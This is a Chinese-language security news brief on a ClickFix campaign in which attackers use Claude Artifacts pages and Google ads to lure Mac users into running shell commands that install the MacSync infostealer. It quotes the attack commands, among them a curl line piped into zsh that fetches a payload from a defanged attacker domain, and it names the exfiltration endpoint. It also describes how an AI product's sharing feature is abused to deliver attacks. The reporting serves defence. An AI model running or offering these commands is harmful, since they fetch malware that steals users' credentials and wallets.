【安全资讯】Claude AI生成内容遭滥用，ClickFix攻击向Mac用户推送信息窃取程序

概要：

网络安全研究人员近期发现，威胁行为者正滥用Anthropic公司Claude大语言模型（LLM）的“Artifacts”（生成物）功能，结合Google广告，在针对macOS用户的ClickFix攻击活动中传播信息窃取恶意软件。这种新型攻击利用用户对AI生成内容的信任，诱骗其执行恶意命令，已造成大量用户面临数据泄露风险，凸显了AI工具被武器化的新趋势。

主要内容：

攻击活动至少存在两种变体。当用户搜索“在线DNS解析器”、“macOS CLI磁盘空间分析器”或“HomeBrew”等特定查询时，Google搜索结果会显示恶意链接。这些链接要么指向一个公开的Claude Artifact页面，要么指向一个冒充苹果支持的Medium文章。两者都诱导用户将恶意Shell命令粘贴到终端（Terminal）中执行。

第一种攻击变体执行的命令是`echo "..." | base64 -D | zsh`，第二种则是`true && cur""l -SsLfk --compressed "https://raxelpak[.]com/curl/[hash]" | zsh`。执行这些命令会从攻击者的服务器下载MacSync信息窃取程序的加载器。该恶意软件使用硬编码的令牌和API密钥与命令控制（C2）基础设施通信，并伪装成macOS浏览器用户代理以隐藏行踪。

根据Moonlock Lab的研究，恶意软件通过AppleScript窃取钥匙串、浏览器数据和加密货币钱包等敏感信息，将数据打包成`/tmp/osalogging.zip`存档，然后通过HTTP POST请求外泄至a2abotnet[.]com/gate。如果传输失败，存档会被分割并重试八次，成功上传后则会清理所有痕迹。研究人员发现，两种变体都从同一个C2地址获取第二阶段载荷，表明是同一威胁行为者所为。

此次攻击是ClickFix攻击模式的演变。此前，攻击者曾滥用ChatGPT和Grok的聊天分享功能传播AMOS信息窃取程序。此次滥用Claude Artifacts，表明威胁已扩展到其他大型语言模型（LLM）。安全专家建议用户保持警惕，避免执行不理解的终端命令，并可在同一聊天会话中询问AI关于所提供命令的安全性以进行初步判断。